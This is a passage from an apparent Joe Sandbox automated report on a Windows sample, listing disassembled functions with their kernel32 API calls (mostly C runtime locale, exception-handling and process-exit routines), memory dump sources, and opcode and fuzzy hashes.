                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004219A0
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004219BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                  • Instruction ID: 516db4477a6e51dbe21ee2870d246937693e17751cc1d143beebadadd3fc4239
                                                  • Opcode Fuzzy Hash: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                  • Instruction Fuzzy Hash: BC51A971B00229ABEF20EFA5DC81ABF73B8BF54704F94446AF500E7260D7749945C769
                                                  Function 00681A5B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 006790EC
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 00679122
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00681B67
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00681BB0
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00681BBF
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00681C07
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00681C26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                  • Instruction ID: 306ee874636052a450b3beb79831be078f9b91095b9bc87f5685e197ffcc05ad
                                                  • Opcode Fuzzy Hash: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                  • Instruction Fuzzy Hash: 8F518471A00209AFDB20EFA5CC81EFE73BEEF06700F144669E514EB250E77099428B65
                                                  Function 00415900 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .AB$.AB
                                                  • API String ID: 0-2297053732
                                                  • Opcode ID: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                  • Instruction ID: 9c6ffa21bb75b4405fc2a4b8468ed771a2dab9a861c59683d1b669e683ffb55f
                                                  • Opcode Fuzzy Hash: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                  • Instruction Fuzzy Hash: DAF13D71E00619DFDF14CFA9D9806EEB7B1FF88314F15826AD819AB344E734A941CB94
                                                  Function 0040D7B5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040D7C1
                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D88D
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D8AD
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040D8B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                  • Instruction ID: d4761c8bc1ea99229fdb17dfe79701451352590760d76ee157224913cadfbb7a
                                                  • Opcode Fuzzy Hash: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                  • Instruction Fuzzy Hash: 0E312F75D0521CDBDB20EFA5DD897CDBBB8BF08304F1040AAE40DA7290EB745A898F49
                                                  Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                  • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                  • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                  • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                  • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                  Function 0066DA1C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0066DA28
                                                  • IsDebuggerPresent.KERNEL32 ref: 0066DAF4
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0066DB14
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0066DB1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                  • Instruction ID: f2055ecdfec3ac66c53a9afb4ba29f38253be50b29e67504fcf0250d5287ec36
                                                  • Opcode Fuzzy Hash: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                  • Instruction Fuzzy Hash: 1531FA75E4521C9BDB60DFA4DD89BCCBBB8BF08304F1041AAE40DA7290EB715A85DF05
                                                  Function 004212A6 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                    • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004212FA
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00421344
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042140A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale$ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 3140898709-0
                                                  • Opcode ID: de291beb99afb6ef89cc7ddbb4d74f1f1f685a5167fa3870cfabe450fd85f2ba
                                                  • Instruction ID: c0bfd8cb71a0601470ff8ebcabc1dd41d73bf956737fdebdb9191936bb842b31
                                                  • Opcode Fuzzy Hash: de291beb99afb6ef89cc7ddbb4d74f1f1f685a5167fa3870cfabe450fd85f2ba
                                                  • Instruction Fuzzy Hash: AE61A2716002279BEB24EF25DC82BBA73A9EF24304F54407BED05C6691E778D981CB58
                                                  Function 0068150D Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 006790EC
                                                    • Part of subcall function 0067908A: _free.LIBCMT ref: 00679122
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00681561
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006815AB
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00681671
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale$ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 3140898709-0
                                                  • Opcode ID: 5cf565187106e2e803034790562054c907a56f684d2ac3c9bf5ead83feb8383a
                                                  • Instruction ID: 2bdcd29ca7760588e8316bfdd980b1fadea70a630160c9d792ddca51d78ad4b3
                                                  • Opcode Fuzzy Hash: 5cf565187106e2e803034790562054c907a56f684d2ac3c9bf5ead83feb8383a
                                                  • Instruction Fuzzy Hash: 8661B4716101079FDB28AF28CC92BFA73AEEF16300F144279E905CA685FB74D986CB54
                                                  Function 0041117B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00411273
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041127D
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041128A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 2c1a32ef1035b5dbf8a491830e48d39a1b8ac0405532fc47cee9a52cbebb52c5
                                                  • Instruction ID: 069db0b729b88edcbe1415199c877a2f5388b532d604f6458ec580dce293a37e
                                                  • Opcode Fuzzy Hash: 2c1a32ef1035b5dbf8a491830e48d39a1b8ac0405532fc47cee9a52cbebb52c5
                                                  • Instruction Fuzzy Hash: E331D674D012289BCB21DF65DC897DDBBB4BF08714F5041EAE50CA62A0E7349B858F49
                                                  Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                  • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                                  • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                  • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                                  Function 006713E2 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 006714DA
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 006714E4
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 006714F1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: d251c0be41ef698f786db62af69caaf638685dfa11e06260af1d2b118d267355
                                                  • Instruction ID: f441762d7f099cb668e492ac40cf3633da178aa4d0abcdef1dbe9d4dbdcd065f
                                                  • Opcode Fuzzy Hash: d251c0be41ef698f786db62af69caaf638685dfa11e06260af1d2b118d267355
                                                  • Instruction Fuzzy Hash: 5D31B3B491122C9BCB61DF68DD897DDBBB9BF18310F5041EAE41CA7290EB709B858F44
                                                  Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                  • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                  • ExitProcess.KERNEL32 ref: 10005F60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                  • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                  • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                  • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                  Function 00674EF6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00674EF5,00000000,004280A0,?,00000000,?,0067933A), ref: 00674F18
                                                  • TerminateProcess.KERNEL32(00000000,?,00674EF5,00000000,004280A0,?,00000000,?,0067933A), ref: 00674F1F
                                                  • ExitProcess.KERNEL32 ref: 00674F31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                  • Instruction ID: 05cdff3694796bb514cf5b094b207af77d7267ca79d5eb773ca57361b08fa2c4
                                                  • Opcode Fuzzy Hash: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                  • Instruction Fuzzy Hash: 7FE0B631101148AFCF21AF64DC0DA6D3B6AEB84752B819428F80986271CF39DD93CA84
                                                  Function 0066092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 0767a01f73073ddf8465d6856b91ef3e7ecdbbdeaa762bea784f0377986859a6
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: 2F316CB6900609DFEB10CF99C880AEEBBF6FF48324F24515AD441A7351D771EA45CBA4
                                                  Function 00675B67 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b390e4a2b809fc06d578254b51388bdd5f5ff6b6fff1ef8d4aef897508a94667
                                                  • Instruction ID: 2327ffe2313f6c37bb338af57d67054ae4eb2d903d4dd6ce8cc996e1d1a5b5ee
                                                  • Opcode Fuzzy Hash: b390e4a2b809fc06d578254b51388bdd5f5ff6b6fff1ef8d4aef897508a94667
                                                  • Instruction Fuzzy Hash: 36F11F71E016199FDF14CFA8C880AEDB7B2EF48314F2582A9D51AAB344D771AE01CF94
                                                  Function 0041C283 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041C27E,?,?,00000008,?,?,004251AB,00000000), ref: 0041C4B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                  • Instruction ID: 1e207280c519bced7d66c8b67978bc6121a932d59d727fe0a847cf8d2cc13a62
                                                  • Opcode Fuzzy Hash: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                  • Instruction Fuzzy Hash: C2B14C31650608DFD714CF28C8C6BA67BA1FF45364F258659E89ACF3A1C339E992CB44
                                                  Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                  • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                  • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                  • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                  Function 0067C4EA Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,0067C4E5,?,?,?,?,?,?,00000000), ref: 0067C717
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                  • Instruction ID: 3cef4c9aa303d2b3266340f2b11943a551584ffddcecfd0812ff2895bf44b49c
                                                  • Opcode Fuzzy Hash: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                  • Instruction Fuzzy Hash: 9AB127712106098FDB19CF28C486AA57BE2FF45364F25C65CE89ACF2A1C735E992CF40
                                                  Function 0040D9B3 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040D9C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: aa7d9029003f00ab9a07ca4a3ca600b7b925c7310fdfda5886337471c3949cde
                                                  • Instruction ID: e83c888262e5176c2e399b2cb9a20f8e3507fb01a93416a2cee5b457c32b1697
                                                  • Opcode Fuzzy Hash: aa7d9029003f00ab9a07ca4a3ca600b7b925c7310fdfda5886337471c3949cde
                                                  • Instruction Fuzzy Hash: 5C515DB2E143098BDB28CF94D9857AABBF4FB48310F24857AD405EB391E3789944CF58
                                                  Function 0041E42D Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b49e464df8cd9887f9f5fc85569800c21fe91771b7d4add5f8fbefd4ba984765
                                                  • Instruction ID: 77ea825dc83433ac70741be358571c0511847a51af220c5e297d248078f8b02c
                                                  • Opcode Fuzzy Hash: b49e464df8cd9887f9f5fc85569800c21fe91771b7d4add5f8fbefd4ba984765
                                                  • Instruction Fuzzy Hash: F341A5B5804218AEDB20DF6ACC89AEAB7B9AF45304F1442DEE81DD3211DA359E858F54
                                                  Function 10007EA9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                  • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                                  • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                  • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                                  Function 0067E694 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
